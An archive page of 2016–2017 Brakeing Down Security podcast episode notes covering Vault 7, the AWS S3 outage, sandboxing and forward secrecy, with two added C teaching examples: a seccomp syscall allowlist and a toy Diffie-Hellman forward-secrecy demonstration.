The best thing is that you can pick up the ebook right now! It's available for pre-order on Safari books (Link), or pre-order on Amazon.com (Link)
Hope you enjoy!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-010-Defensive_Security_handbook.mp3
Itunes: (look for '2017-010') https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
Previous Lee Brotherston episodes:
Threat Modeling w/ Lee Brotherston
Lee fills in for Mr. Boettcher, along with Jarrod Frates
TLS fingerprinting application
#Bsides #London is accepting Call for Papers (#CFP) starting 14 February 2017, as well as a Call for Workshops. Tickets are sold out currently, but there will be other chances for tickets. Follow @bsidesLondon for more information. You can find out more information at https://www.securitybsides.org.uk/
CFP closes 27 March 2017
Published on: March 22, 2017
Wikileaks published a cache of documents and information from what appears to be a wiki from the Central Intelligence Agency (CIA).
This week, we discuss the details of the leak (as of 11 Mar 2017), and how damaging it is to blue teamers.
To help us, we asked Mr. Dave Kennedy (@hackingDave) to sit down with us and discuss what he found, and his opinions of the data that was leaked. Mr. Kennedy is always a great interview, and his insights are now regularly seen on Fox Business News, CNN, and MSNBC.
Dave isn't one to rest on his laurels. Many of you know him as the co-organizer of #derbycon, as well as a board member of #ISC2. We ask him about initiatives going on with ISC2, and how you (whether or not you're an ISC2 cert holder) can help with various committees and help improve the certification landscape. We talk about how to get involved.
We finish up asking about the latest updates to DerbyCon, as well as the dates for tickets, and we talk about our CTF for a free ticket to DerbyCon.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-009-dave_kennedy_vault7_isc2_derbycon_update.mp3
Youtube: https://www.youtube.com/watch?v=lqXGGg7-BlM
iTunes: https://itunes.apple.com/us/podcast/2017-009-dave-kennedy-talks-abotu-cias-vault7-isc2/id799131292?i=1000382638971&mt=2
--show notes--
http://www.bbc.com/news/world-us-canada-10758578
WL: “CIA ‘hoarded’ vulnerabilities or ‘cyber-weapons’”
Should they not have tools that allow them to infiltrate systems of ‘bad’ people?
Promises to share information with manufacturers
BrBr- Manufacturers and devs are the reason the CIA has ‘cyber-weapons’
Shit code, poor software design/architecture
Security wonks aren’t without blame here either
http://www.bbc.com/news/technology-39218393 -RAND report
Report suggested stockpiling is ‘good’
“On the other hand, publicly disclosing a vulnerability that isn't known by one's adversaries gives them the upper hand, because the adversary could then protect against any attack using that vulnerability, while still keeping an inventory of vulnerabilities of which only it is aware of in reserve.”
Encryption does still work, in many cases… as it appears they are having to intercept the data before it makes it into secure messaging systems…
http://abcnews.go.com/Technology/wireStory/cia-wikileaks-dump-tells-us-encryption-works-46045668
(somewhat relevant? Not sure if you want to touch on https://twitter.com/bradheath/status/837846963471122432/photo/1)
Wikileaks - more harm than good?
Guess that depends on what side you’re on
What side is Assange on? (his own side?)
Media creates FUD because they don’t understand
Secure messaging apps busted (FUD inferred by WL)
In fact, the encryption is not broken: data is captured on the device before encryption is applied.
Some of the docs make you wonder about the need for ‘over-classification’
Vulnerabilities uncovered
Samsung Smart TVs “Fake-Off”
Tools to exfil data off of iDevices
BrBr- Cellebrite has sold that for years to the FBI
CIA appears to only have up to iOS 9 (according to docs released)
Car hacking tech
Sandbox detection (notices mouse clicks or the lack of them)
Reported by eEye: https://wikileaks.org/ciav7p1/cms/page_2621847.html
Technique: Process Hollowing: https://wikileaks.org/ciav7p1/cms/page_3375167.html
Not new: https://attack.mitre.org/wiki/Technique/T1093
**anything Mr. Kennedy feels is important to mention**
What can blue teamers do to protect themselves?
Take an accounting of ‘smart devices’ in your workplace
Educate users on not bringing smart devices to work
And at home (if they are remote)
Alexa,
Restrict smart devices in sensitive areas
SCIFs, conference rooms, even in ‘open workplace’ areas
Segment possibly affected systems from the internet
Keep proper inventories of software used in your environment
Modify IR exercises to allow for this type of scenario?
Reduce ‘smart’ devices
Grab that drill and modify the TV in the conference room
Cover the cameras on TV
Is that too paranoid?
Don’t set up networking on smart devices or use cloud services on ‘smart’ devices
Remind devs that unpatched or crap code can become the next ‘cyber-weapon’ ;)
Published on: March 14, 2017
If you were under a rock, you didn't hear about the outage that #Amazon #Web Services (#AWS) suffered at the hands of sophisticated, nation-state... wah?
"an authorized #S3 team #member using an established #playbook executed a command which was intended to remove a small number of servers for one of the S3 subsystems that is used by the S3 billing process. Unfortunately, one of the inputs to the command was entered incorrectly and a larger set of servers was removed than intended."
Well... okay, so for companies that do regular incident response (IR) exercises and have a good majority of their assets and production in cloud-based services, is it time to discuss having the 'extreme' scenario of 'What do we do when [AWS|Azure|Google Compute] goes down?'
We also discuss an article about #developers who want to get rid of the #whiteboard #interview... is it as #discriminatory as they suggest, or is it just devs who aren't confident or lacking #skills trying to get hired? (see show notes below for links)
Finally, we talk about Ms. #Berlin's talk she will be giving at #AIDE on 6-7 April. It's gonna be a "hands-on" talk. What do we mean? Listen to our show and find out.
#AIDE - https://appyide.org/events/ $60
more info: https://appyide.org/1313-2/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-008-AWS_S3_outage-IR_scenarios_white-board-interviews.mp3
---show notes---
AWS S3 outage (hopefully more information by the end of the week)
Massive outages - many sites down
IoT devices borked https://techcrunch.com/2017/02/28/amazon-aws-s3-outage-is-breaking-things-for-a-lot-of-websites-and-apps/
https://www.wired.com/2017/02/happens-one-site-hosts-entire-internet/
TL;DR of the S3 outage - "an authorized S3 team member using an established playbook executed a command which was intended to remove a small number of servers for one of the S3 subsystems that is used by the S3 billing process. Unfortunately, one of the inputs to the command was entered incorrectly and a larger set of servers was removed than intended."
Brian: Water sprinkler story…
Do we put too much stock in Amazon?
Email Story time: Recent IR exercise
Mostly AWS shop
“If we suspend reality” drinking game
World War Z “the 10th man”
Not the 1st time AWS was involved in an outage:
Realistic IR exercises need to examine the ‘ultimate’ bad…
Even if you’re in ‘suspend reality’ mode
http://blog.interviewing.io/you-cant-fix-diversity-in-tech-without-fixing-the-technical-interview/
No problem with copy/paste, hunting up functions, etc
The problem comes when you fail to understand the code you’re using and how it integrates with the rest of your program
Programming Interviews Exposed
LOVED this idea….
https://letsjusthackshit.org/platypuscon2016.html
“In the spirit of what brought this community together, we’re aiming to build a super hands-on event: that is, instead of a series of talks while you plan on missing to catch up with your friends at the cafe down the road, we’re putting together a full day of hands-on workshops where you can get your hands dirty and we can all help each other learn something new.”
Patreon - just pop a dollar
CTF Club - Tuesdays 9am Pacific / 6pm Pacific
Book club - Defensive Security Handbook - Starting 15 March
Published on: March 6, 2017
Bryan had the pleasure of attending his 3rd Bsides Seattle a few weeks ago. Lots of great speakers, great discussion.
We have 3 interviews here this week:
Justin Case (@jcase) discusses some of his talk about hacking the Google Pixel, an HTC produced phone. We discuss why Android gets the 'insecure' moniker by the media, and whether it's warranted or not.
Next, Sam Vaughn (@sidechannel_org) talks about setting up the Crypto Village, why he does it, and what you can learn by solving these puzzles.
Finally, Matt Domko discusses his experiences with Bro, as well as using Bro for packet analysis and what is needed when analyzing packets...
If you are looking for some great content, a Bsides is nearby, just look around...
Other Twitter handles mentioned on the show...
@ben_ra
@firewater_devs (both phone hackers)
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-007-bsides_seattle_Feb2017.mp3
Published on: March 1, 2017
Joel Scambray joined us this week to discuss good app design, why it's so difficult, and what can be done to fix it when possible.
Joel also co-authored many of the "Hacking Exposed" series of books. We ask him about other books that could come from the well known series.
We also ask why the #infosec person often feels the need to protect their organization at the expense of their own position (or sanity), and how we as an industry should not be 'in front of the train', but guiding the train to its destination, one of prosperity and security. Conversely, we also discuss why some positions in security are so short-lived, such as the role of CISO.
From SC magazine (https://www.scmagazineuk.com/joel-scambray-joins-ncc-group-as-technical-director/article/634098/):
"Security expert and author, Joel Scambray, has joined NCC Group as technical director. He will be based at the Austin, US office.
Scambray has more than 20 years of experience in information security. In his new role, he will work with some of the company's biggest clients using his experience in business development, security evangelism and strategic consultancy."
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-006-Joel_scambray-infosec_advice-hacking_exposed.mp3
iTunes (generic link, subscribe for podcast): https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
Brakesec Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
-------
Show Notes:
Joel Scambray
In a bio:
“Joel’s words of security wisdom: Security is a type of risk management, which is about informing a decision. The security professional’s challenge is to bring the most evidence possible to support those decisions, both technical and non.”
Building and maintaining a security program
Which is better?
starting with a few quick wins
Or having an overarching project to head where you want to go
Starting companies (buyouts / stock options / lessons learned)
Hacking Exposed
Will you stop at ‘7’?
Will there be a “hacking exposed: IoT”?
Medical devices
What leadership style works best for you?
Things we couldn’t cover due to time:
Security Shift from network layer to app layer
Software defined networking, for example
How to set policies to keep your devs from running amok
------
Published on: February 19, 2017
Mick Douglas is always great to have on. A consummate professional, and blue team advocate for years now, he teaches SANS courses designed to help defenders against the forces of the red team, pentesters, and even bad actors.
But this week, we have a different Mr. Douglas. This week, he's here to talk about sales tactics, #neuro #linguistic #programming, leading the question, and other social engineering techniques that salespeople use to get you to buy what your company may not need, but thinks it does. We have some good times discussing ways to ensure the buying of your new shiny box at work goes more smoothly, what you should look out for, and ways to tell if they are over-selling and under-delivering.
Also, Mick has been working on a project near and dear to his heart. After discussing it with @carnal0wnage a year or so back, he's fleshed out a spreadsheet that tracks attack vectors and, depending on what controls are in your environment, can show you how effective a particular attack would be against your environment. This would be a great asset to blue teams who want to shore up defenses, especially if they are vulnerable in a particular area. Mr. Douglas is looking for comments, suggestions, and additions to his spreadsheet, and you can even download a copy of the Google Doc to try in your own environment, free of charge.
Book mentioned in the show: (non-sponsored link) https://www.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X
Mick's document:
https://docs.google.com/spreadsheets/d/1pI-FI1QITaIjuBsN30au1ssbJAZawPA0BYy8lp6_jV8/edit#gid=0
Mick refers to the MITRE ATT&CK matrix in the show; here's our show discussing it:
http://traffic.libsyn.com/brakeingsecurity/2015-051-ATTACK_Matrix.mp3
https://attack.mitre.org/wiki/ATT%26CK_Matrix
Mick's last appearances on BrakeSec:
http://traffic.libsyn.com/brakeingsecurity/2015-024-Mick_Douglas.mp3
http://traffic.libsyn.com/brakeingsecurity/2015-025-Mick_douglas_part2.mp3
http://traffic.libsyn.com/brakeingsecurity/2015-032-Jarrod_and_Mick_DFIR.mp3
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-005-mick_douglas-attack_defense_worksheet.mp3
iTunes: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
YouTube: https://www.youtube.com/watch?v=A3K-2yneKU4
Published on: February 14, 2017
This week, we discuss sandboxing technologies. Most of the time, infosec people are using sandboxes and similar technology for analyzing malware and malicious software.
Developers use them to create additional protections, or even to create defenses to ward off potential attack vectors.
We discuss sandboxes and sandboxing technology, jails, chrooting of applications, and even tools that keep applications honest, in particular the pledge(2) function in OpenBSD.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-004-Sandboxing_technology.mp3
iTunes: https://itunes.apple.com/us/podcast/2017-004-sandboxes-jails-chrooting/id799131292?i=1000380833781&mt=2
YouTube: https://www.youtube.com/watch?v=LqMZ9aGzYXA
-----------
Show notes:
Sandboxing tech - https://hangouts.google.com/call/yrpzdahvjjdbfhesvjltk4ahgmf
A sandbox is implemented by executing the software in a restricted operating system environment, thus controlling the resources (for example, file descriptors, memory, file system space, etc.) that a process may use.
Various types of sandbox tech
Jails - freebsd
Much like Solaris 10’s zones: a restricted operating system environment, into which you can also install other OSes, like Debian
http://devil-detail.blogspot.com/2013/08/debian-linux-freebsd-jail-zfs.html
pledge(2) - new to OpenBSD
Program says what it should use, if it steps outside those lines, it’s killed
http://www.tedunangst.com/flak/post/going-full-pledge
http://man.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man2/pledge.2?query=pledge
http://www.openbsd.org/papers/hackfest2015-pledge/mgp00008.html
Chroot - openbsd, linux (chroot jails)
“A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children”
Example: “www” runs in /var/www. A chrooted www website must contain all the necessary files and libraries inside of /var/www, because to the application /var/www is ‘/’
Rules based execution - AppArmor, PolicyKit, SELinux
Allows users to set what will be run, and which apps can inject DLLs or objects.
“It also can control file/registry security (what programs can read and write to the file system/registry). In such an environment, viruses and trojans have fewer opportunities of infecting a computer.”
https://en.wikipedia.org/wiki/Seccomp
https://en.wikipedia.org/wiki/Linux_Security_Modules
Android VMs
Virtual machines - sandboxes in their own right
Snapshot capability
Revert once changes have occurred
CON: some malware will detect VM environments and change its behaviour
Containers (docker, kubernetes, vagrant, etc)
Quick standup of images
Blow away without loss of host functionality
Helpful to run containers as an un-privileged user.
https://blog.jessfraz.com/post/getting-towards-real-sandbox-containers/
Chrome sandbox: https://chromium.googlesource.com/chromium/src/+/master/docs/linux_sandboxing.md
Emulation Vs. Virtualization
http://labs.lastline.com/different-sandboxing-techniques-to-detect-advanced-malware --seems like a good link
VMware Thinapp (emulator):
Malware lab creation (Alienvault blog):
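The pledge idea in the notes above ("program says what it should use, if it steps outside those lines, it's killed"), as an added example that is not from the show, from OpenBSD or from the linked man page: on Linux the nearest building block is seccomp-bpf (the Seccomp link above), so this C program installs a kill-by-default syscall allowlist in a forked child, runs one function that stays inside its promises and one that does not, and reports the SIGSYS kill. The promise set (write/exit), the getpid trespass and all helper names are my own choices; it is Linux-only.

```c
/* Linux seccomp-bpf allowlist in the spirit of OpenBSD's pledge(2): the program
 * declares the syscalls it will use and any other call kills it on the spot.
 * Added example, not from the show or OpenBSD; Linux-only, glibc, kernel >= 3.5. */
#define _GNU_SOURCE
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

#if defined(__x86_64__)
#  define THIS_AUDIT_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#  define THIS_AUDIT_ARCH AUDIT_ARCH_AARCH64
#else
#  error "add the AUDIT_ARCH_* constant for this architecture"
#endif
#define MAX_ALLOWED 16
enum sandbox_result {
    SANDBOX_EXITED_OK = 0,  /* child kept its promises and exited 0 */
    SANDBOX_KILLED_SIGSYS,  /* child made an undeclared syscall and was killed */
    SANDBOX_OTHER           /* filter not installed, or an unexpected exit */
};

/* Install a kill-by-default filter that allows only the given syscall numbers.
   SECCOMP_RET_KILL is thread-scoped, which is enough for a single-threaded child. */
static int pledge_syscalls(const int *allowed, size_t n)
{
    struct sock_filter prog[5 + 2 * MAX_ALLOWED];
    size_t i, len = 0;
    if (n > MAX_ALLOWED) return -1;
    /* Syscall numbers differ per architecture: refuse foreign-ABI calls first,
       or the allowlist could be sidestepped by switching calling convention. */
    prog[len++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                                              offsetof(struct seccomp_data, arch));
    prog[len++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K,
                                              THIS_AUDIT_ARCH, 1, 0);
    prog[len++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL);
    /* Load the syscall number and compare it against each promise in turn. */
    prog[len++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                                              offsetof(struct seccomp_data, nr));
    for (i = 0; i < n; i++) {
        prog[len++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K,
                                                  (unsigned int)allowed[i], 0, 1);
        prog[len++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW);
    }
    /* Anything not promised: kill, do not merely fail the call with errno. */
    prog[len++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL);
    struct sock_fprog fprog = { .len = (unsigned short)len, .filter = prog };
    /* Unprivileged processes may install filters only after forswearing setuid gains. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog) == 0 ? 0 : -1;
}

/* Fork; the child promises only write/exit and runs fn; the parent reports. */
static enum sandbox_result run_sandboxed(int (*fn)(void))
{
    static const int promises[] = { SYS_write, SYS_exit_group, SYS_exit };
    int status;
    pid_t pid = fork();
    if (pid < 0) return SANDBOX_OTHER;
    if (pid == 0) {
        if (pledge_syscalls(promises, sizeof promises / sizeof promises[0]) != 0)
            _exit(2);
        /* _exit, not exit(): exit() flushes stdio and runs atexit handlers,
           which can issue syscalls that were never promised. */
        _exit(fn());
    }
    if (waitpid(pid, &status, 0) != pid)
        return SANDBOX_OTHER;
    if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSYS)
        return SANDBOX_KILLED_SIGSYS;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? SANDBOX_EXITED_OK : SANDBOX_OTHER;
}

/* Stays inside the lines: raw write(2), no stdio (printf would fstat first). */
static int well_behaved(void)
{
    (void)!write(STDOUT_FILENO, "inside the lines\n", 17); /* a short write is no violation */
    return 0;
}

/* Steps outside: getpid(2) was never promised, so the kernel kills us here. */
static int steps_outside(void)
{
    return syscall(SYS_getpid) > 0 ? 0 : 1;   /* never returns under the filter */
}

int main(void)
{
    printf("well_behaved : %d (0 = exited ok)\n", run_sandboxed(well_behaved));
    printf("steps_outside: %d (1 = killed by SIGSYS)\n", run_sandboxed(steps_outside));
    return 0;
}
```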
News: (assuming it goes short)
SHA-1 generated certs will be deprecated soon - https://threatpost.com/sha-1-end-times-have-arrived/123061/
(whitelisting files in Apache)
https://isc.sans.edu/diary/Whitelisting+File+Extensions+in+Apache/21937
http://blog.erratasec.com/2017/01/the-command-line-for-cybersec.html
https://github.com/robertkuhar/java_coding_guidelines
https://www.us-cert.gov/sites/default/files/publications/South%20Korean%20Malware%20Attack_1.pdf#
https://www.concise-courses.com/security/conferences-of-2017/
Published on: February 6, 2017
Amanda Berlin attended Shmoocon this year, and sat down with a few people. She discussed a bit with John about what HackEd is about (http://hackeducate.com/)
Amanda writes: "I had an amazing time at my 3rd #Shmoocon. I was able to interview a handful of really cool people working on several different types of infosec education. I was able to watch a few talks, spend some time in the lockpick village, as well as go to Shmoocon Epilogue. It’s always amazing to watch people talk about what they are passionate about, and Shmoocon is a great relaxed environment where that happens frequently."
James Green @greenjam94
Aaron Lint @lintile
Jon? @hackeducate
Melanie Rich-Wittrig @securitycandy
Melanie Rich-Wittrig (@securitycandy) discusses how she's empowering kids to get into information security, even as early as age 10 or 11. She discusses how she motivates them by teaching CTF and hacking concepts, and gamifying with point systems.
www.securitycandy.com
RSS: http://www.brakeingsecurity.com/rss
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-003-ShmooCon_Audio.mp3
Published on: January 29, 2017
In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike.
But what if your company cannot afford such products, or is not ready to engage those types of companies, and still needs protection? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc.
We discuss some of the issues with using them, and how to use them in your #environment.
Lastly, we discuss #mentorship. Having a good mentor/mentee relationship can be mutually beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor...
RSS: www.brakeingsecurity.com/rss
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3
iTunes: https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2
YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE
Show Notes:
HANGOUTS: https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme
2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring
We start Brakeing Down Security with a huge surprise! A 3rd member of the podcast! Amanda #Berlin (@infosystir) joins us this year to help us educate people on #security topics. During the year, she'll be getting us some audio from various conventions and giving us her perspective working as an #MSSP, as well as a blue team (defender).
We start out talking about new #California #legislation about making #malware illegal. What are politicians in California thinking? We work through that and try to find some understanding.
With all the various secure messaging systems out there, we discuss why secure messaging systems fail so badly with regard to #interoperability, and the difficulties in getting average non-infosec people to adopt one. We also discuss #Perfect #Forward #Secrecy and how it prevents people from decrypting old messages, even if the key is compromised.
---Show Notes---
News story:
http://www.latimes.com/politics/la-pol-sac-crime-ransomware-bill-20160712-snap-story.html
“If this legislation gives prosecutors the tools that they didn’t have before, where are the cases that they have lost because they didn’t have these tools?” said Brandon Perry, a senior consultant for NTT Com Security. “Authorities are focused on prosecuting criminals that they can’t even find, as opposed to educating the victims to prevent this from happening again and again.”
Ransomware won’t infect you if you watch training videos:
http://thehackernews.com/2017/01/decrypt-ransomware-files.html
Secure messaging - stuck in an Apple ecosystem
Too many, no interoperability
Signal, Whisper, Wickr, Wire, WhatsApp, FB messenger
I uninstalled Signal… can’t convince people to adopt something if everyone cannot message one another --BrBr
OpenPGP is ‘dangerous’
http://arstechnica.com/information-technology/2016/12/signal-does-not-replace-pgp/
Forward Secrecy - https://en.wikipedia.org/wiki/Forward_secrecy
“A public-key system has the property of forward secrecy if it generates one random secret key per session to complete a key agreement, without using a deterministic algorithm.” (a deterministic algorithm gives the same output for the same input every time)
Perfect Forward Secrecy - “In cryptography, forward secrecy (FS; also known as perfect forward secrecy[1]) is a property of secure communication protocols in which compromise of long-term keys does not compromise past session keys.”
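The definition just quoted, worked through as an added example in C (mine, not from the show or the Wikipedia article): a toy Diffie-Hellman with a 61-bit prime and fixed stand-in exponents, run once with the server's long-term key doing the key agreement and once with fresh per-session keys; the long-term key is then "stolen" and replayed against the recorded transcripts. The prime, base, exponents and function names are all constructed for the demonstration.

```c
/* Toy walkthrough of the forward-secrecy property quoted above. Added example,
 * not from the show or the linked article. The 61-bit Mersenne prime and the
 * fixed "random" exponents keep it deterministic and runnable; they are far too
 * small for real use, and only the key-lifecycle argument carries over. */
#include <stdint.h>
#include <stdio.h>

#define P 2305843009213693951ULL   /* 2^61 - 1, the toy Diffie-Hellman modulus */
#define G 3ULL                     /* toy group base */

/* Everything a passive eavesdropper records from one session: public shares only. */
struct transcript {
    uint64_t client_pub;   /* G^c mod P */
    uint64_t server_pub;   /* G^s mod P (static scheme) or G^e mod P (ephemeral) */
};

static uint64_t mulmod(uint64_t a, uint64_t b)
{
    return (uint64_t)(((unsigned __int128)a * b) % P);
}

static uint64_t powmod(uint64_t base, uint64_t exp)
{
    uint64_t result = 1;
    base %= P;
    for (; exp; exp >>= 1) {
        if (exp & 1)
            result = mulmod(result, base);
        base = mulmod(base, base);
    }
    return result;
}

/* Scheme A, no forward secrecy: the server's long-term DH key does the key
 * agreement in every session. Returns the session key both sides derive
 * (0 if they disagree) and leaves the eavesdropper's view in *t. */
static uint64_t static_dh_session(uint64_t server_long_term, uint64_t client_eph,
                                  struct transcript *t)
{
    t->client_pub = powmod(G, client_eph);
    t->server_pub = powmod(G, server_long_term);   /* identical every session */
    uint64_t k_client = powmod(t->server_pub, client_eph);
    uint64_t k_server = powmod(t->client_pub, server_long_term);
    return k_client == k_server ? k_client : 0;
}

/* Scheme B, forward secrecy: both sides draw a fresh exponent per session and
 * erase it afterwards. The long-term key only authenticates the server's share
 * (signature omitted here); it never enters the key computation. */
static uint64_t ephemeral_dh_session(uint64_t client_eph, uint64_t server_eph,
                                     struct transcript *t)
{
    t->client_pub = powmod(G, client_eph);
    t->server_pub = powmod(G, server_eph);
    uint64_t k_client = powmod(t->server_pub, client_eph);
    uint64_t k_server = powmod(t->client_pub, server_eph);
    return k_client == k_server ? k_client : 0;
}

/* Months later the attacker obtains the server's long-term private key and
 * replays the recorded transcript through the server's own DH step. */
static uint64_t attacker_replay(const struct transcript *t, uint64_t stolen_long_term)
{
    return powmod(t->client_pub, stolen_long_term);
}

/* Constructed stand-ins for secrets that would be random in a real system. */
#define SERVER_LONG_TERM 0x1D3A5F7C9E2B4681ULL
#define CLIENT_EPH_DAY1  0x0A6F1C3E5B7D9F24ULL
#define SERVER_EPH_DAY1  0x13579BDF2468ACE1ULL

/* 1 if a past Scheme A session key falls to the stolen long-term key. */
static int static_scheme_compromised(void)
{
    struct transcript t;
    uint64_t k = static_dh_session(SERVER_LONG_TERM, CLIENT_EPH_DAY1, &t);
    return k != 0 && attacker_replay(&t, SERVER_LONG_TERM) == k;
}

/* 1 if a past Scheme B session key survives the same theft: the transcript holds
 * G^c and G^e, the stolen key is the exponent of neither, so the replay misses. */
static int ephemeral_scheme_survives(void)
{
    struct transcript t;
    uint64_t k = ephemeral_dh_session(CLIENT_EPH_DAY1, SERVER_EPH_DAY1, &t);
    return k != 0 && attacker_replay(&t, SERVER_LONG_TERM) != k;
}

int main(void)
{
    printf("static DH, long-term key stolen later: past session key recovered? %s\n",
           static_scheme_compromised() ? "yes" : "no");
    printf("ephemeral DH, same theft: past session key recovered? %s\n",
           ephemeral_scheme_survives() ? "no" : "yes");
    return 0;
}
```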
Ms. Amanda’s pentest homework:
“https://docs.google.com/document/d/17NJPXpqB5Upma2-6Hu5svBxd8PH0Ex7VgCvRUhiUNk8/edit”
Published on: January 12, 2017
It's the final episode of the year, and we didn't slouch on the #infosec. Mr. Boettcher discussed what should happen when we find risk and how we handle it in a responsible manner.
I also issue an 'open-letter' to C-Level. We need C-Levels to listen to and accept the knowledge and experience of their people. Infosec people are often the only thing keeping a company from making the front page, and yet are still seen as speed bumps.
We also discuss some of the previous episodes of the year, and some recent developments to build our #community, like our book club and upcoming #CTF club.
Plus, there is one other surprise, but you'll have to wait until our next episode to find out!
Enjoy our final episode of 2016. Our regular show will return the week of 9 January 2017!
https://en.wikipedia.org/wiki/Yahoo!_data_breaches#Legal_and_commercial_responses
YouTube: https://www.youtube.com/watch?v=w56W5gMMg0E
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-051-State_of_the_podcast_Finding_and_managing_risk.mp3
Special deal for our #BrakeSec Listeners:
"If you have an interesting security talk and fancy visiting #Amsterdam in the spring, then submit your talk to the Hack In The Box (#HITB) Amsterdam conference, which will take place between 10 to 14 April 2017. The Call For Papers (#CFP) is open until the end of December, submission details can be found at https://cfp.hackinthebox.org/.
Tickets are already on sale, with early bird prices until 31 December 2016. And the 'brakeingsecurity' discount code gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity!
Published on: December 25, 2016
Brakesec Podcast joined:
Edgar #Rojas (@silverFox) and Tracy #Maleef (@infosecSherpa) from the #PVC #Security #podcast (@pvcsec)
Joe Gray (@C_3PJoe) from the Advanced Persistent Security Podcast
Jerry #Bell (@maliciousLink) and Andrew #Kalat (@lerg) from the #Defensive Security podcast (@defensiveSec)
And Amanda #Berlin (@infosystir) for a light-hearted holiday party. We discuss things we learned this year, and most of us refrained from making the famous "#prediction" lists. You also get to hear my lovely wife come in and bring me #holiday #sweeties and even dinner, as she had no idea we were recording at the time (she later told me "You sounded like you were having too much fun, so I assumed you weren't recording")
**there might be some explicit language**
Join us, won't you, and listen to 3 fantastic podcasts mix it up for the holidays.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-050-holiday_spectacular-defsec-advpersistsec-brakesec-infosystir.mp3
#YouTube: https://www.youtube.com/watch?v=sJaAG0KRpDY
#iTunes: https://itunes.apple.com/us/podcast/2016-050-holiday-spectacular/id799131292?i=1000379206297&mt=2
Published on: December 21, 2016
"Always Be Closing" is the mantra that Alec Baldwin's character "Blake" intones in the movie "#Glengarry #Glen #Ross". Ironically, the film about 4 men selling was a failure in the theaters.
A lot of times as #blue #teamers, we find ourselves in the sights of a #sales person, or often enough, we are inviting them into our conference rooms to find out how their widget will help save the day. There's an art to the concept of selling, honed over the past 500,000 years, since Ugg tried to convince Oog that his wheel would revolutionize work...
We asked Ms. Amanda Berlin (@infosystir) to join us this week, for her expertise working at a security company and as someone who sells products, to discuss how and why sales and sales engineers do what they do. I posit that there must be a 'decision tree' or script that most follow in an effort to make a sale, and we discuss how to confront the pushy sales pitch head on, or, Amanda's way, how to avoid it altogether.
We discuss Amanda's book she co-wrote with Lee Brotherston, whom we've had on our show before. Their #O'Reilly #book is on pre-sale right now, so you can order "The #Defensive #Security #Handbook" here: http://shop.oreilly.com/product/0636920051671.do
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-049-amanda_berlin_the_art_of_the_sale_decision_making_trees.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-049-amanda-berlin-art/id799131292?i=1000378988303&mt=2
Youtube: https://www.youtube.com/watch?v=v0llOSXfzBg
As part of our ongoing discussion about the #SDLC and getting security baked in as far left as possible, Joe Gray, host of the Advanced Persistent Security #Podcast (find it at https://advancedpersistentsecurity.net/), Mr. Boettcher, and I sat down with Dr. Gary McGraw, author of "Software Security: Building Security In", to discuss his book. We are also reading this book as part of the Brakesec Book Club (check out our #Slack channel for more information).
Gary walks us through the seven touchpoints for building security in, including automated and manual code review, proper penetration testing of the application at various stages, documentation (if you don't know how it works, how can you test it?), and Security Operations monitoring the application once it goes into production. Also, find out which chapter he thinks you should skip altogether... the answer may surprise you... :)
Join Mr. Gray, Mr. Boettcher, and me for a discussion with a true leader in the software and application security industry.
Buy the book on Amazon: https://www.amazon.com/Software-Security-Building-Gary-McGraw/dp/0321356705
Check out Gary's Website at https://www.garymcgraw.com/, and check out Gary's own podcast the Silver Bullet Security Podcast at https://www.garymcgraw.com/technology/silver-bullet-podcast/
Gary's twitter is @cigitalgem
Joe Gray's twitter is @C_3PJoe
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-048-Gary_McGraw_Securing_Your_SDLC_and_guest_host_Joe_Gray.mp3
